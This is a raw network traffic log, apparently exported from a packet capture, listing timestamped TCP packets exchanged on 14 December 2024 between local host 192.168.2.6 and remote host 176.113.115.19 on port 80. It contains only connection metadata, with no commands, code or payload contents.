                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.297288895 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.300693989 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.300707102 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.300748110 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.300748110 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.304136992 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.304259062 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.304284096 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.304541111 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.307831049 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.307917118 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.307967901 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.307967901 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.311347961 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.311465025 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.311600924 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.314949989 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.315026045 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.315031052 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.315335035 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.318568945 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.318628073 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.318681955 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.318772078 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.322187901 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.322292089 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.322293043 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.322371960 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.325977087 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.326065063 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.326090097 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.326154947 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.329410076 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.329494953 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.329534054 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.329534054 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.333054066 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.333168030 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.333194017 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.333261013 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.336592913 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.336690903 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.336726904 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.336827993 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.340269089 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.340347052 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.340423107 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.340573072 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.343898058 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.343959093 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.427233934 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.427289963 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.427314997 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.427356005 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.428828955 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.428917885 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.429024935 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.429177999 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.431797028 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.431910992 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.432948112 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.433001041 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.433041096 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.433665991 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.436038017 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.436100006 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.436351061 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.436352015 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.439074039 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.439208984 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.439280987 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.442039013 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.442171097 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.442248106 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.444921017 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.445029974 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.445391893 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.447695017 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.447798014 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.447874069 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.450536966 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.450660944 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.450721025 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.453238964 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.453376055 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.453655005 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.455918074 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.456018925 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.456286907 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.458592892 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.458692074 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.458725929 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.459958076 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.461137056 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.461234093 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.461240053 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.463707924 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.463788033 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.463820934 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.463943958 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.466250896 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.466418028 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.466491938 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.468758106 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.468821049 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.468844891 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.468976021 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.471296072 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.471415997 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.471479893 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.473745108 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.473803997 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.473906040 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.476675034 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.476785898 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.476808071 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.476903915 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.478945971 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.479031086 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.479091883 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.481300116 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.481359005 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.481645107 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.483859062 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.484054089 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.484175920 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.486310959 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.486376047 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.486434937 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.488303900 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.489712000 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.489759922 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.489830971 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.491281033 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.491420984 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.491483927 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.493783951 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.493966103 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.494045973 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.496264935 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.496328115 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.496428967 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.499200106 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.499344110 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.499371052 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.499412060 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.501344919 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.501466036 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.501548052 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.503740072 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.503827095 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.504353046 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.506206036 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.506337881 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.506551027 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.508729935 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.508826017 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.508905888 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.511235952 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.511346102 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.511421919 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.513700008 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.513802052 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.513884068 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.516294003 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.516386986 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.516423941 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.517874956 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.518712997 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.518726110 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.518809080 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.518809080 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.521207094 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.521219969 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.521274090 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.523685932 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.523799896 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.523909092 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.526228905 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.526319981 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.526392937 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.528736115 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.528899908 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.528901100 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.530020952 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.531245947 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.531343937 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.531786919 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.533700943 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.533754110 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.533849001 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.534439087 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.536216974 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.536261082 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.536287069 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.538238049 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.538922071 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.538966894 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.539177895 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.541198015 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.541294098 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.541320086 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.541512012 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.543704033 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.543829918 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.543891907 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.546180964 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.546226978 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.546288967 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.546387911 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.548676968 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.548732996 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.548755884 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.548933983 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.551287889 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.551383018 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.551584005 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.553761005 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.553798914 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.553921938 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.556210041 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.556325912 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.556354046 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.557177067 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.558706045 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.558768034 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.558815002 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.559092045 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.619362116 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.619472980 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.619618893 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.620292902 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.620368004 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.620517015 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.622198105 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.622296095 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.622334957 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.624134064 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.624151945 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.624196053 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.624401093 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.626038074 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.626086950 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.626138926 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.627899885 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.628010035 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.628086090 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.629729986 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.629793882 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.629878998 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.631567955 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.631671906 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.631771088 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.633335114 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.633358955 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.633398056 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.633436918 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.635305882 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.635483027 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.635560989 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.637516975 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.637536049 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.637670040 CET4972680192.168.2.6176.113.115.19
